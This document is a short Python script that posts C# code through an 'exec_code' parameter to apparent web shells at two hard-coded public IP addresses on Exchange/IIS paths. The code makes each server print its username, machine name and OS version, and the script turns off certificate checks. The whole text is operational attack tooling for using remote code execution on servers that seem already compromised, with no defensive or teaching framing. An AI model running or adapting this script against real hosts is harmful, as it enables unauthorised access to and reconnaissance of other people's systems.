import requests
requests.packages.urllib3.disable_warnings()
code='Response.Write("PWN|"+System.Environment.UserName+"|"+System.Environment.MachineName+"|"+System.Environment.OSVersion);'
for u in ["https://41.231.84.161/aspnet_client/pucfau.aspx","https://79.127.113.30/owa/auth/spbymr.aspx"]:
    try:
        r=requests.post(u,headers={'Content-Type':'application/x-www-form-urlencoded'},params={"exec_code":code},verify=False,timeout=25)
        line=[l for l in r.text.split('!BD')[0].splitlines() if l.strip()]
        print(f"[{r.status_code}] {u} -> {r.text.split('!BD')[0][:90]!r}")
    except Exception as e:
        print(f"[ERR] {u} {type(e).__name__} {str(e)[:80]}")
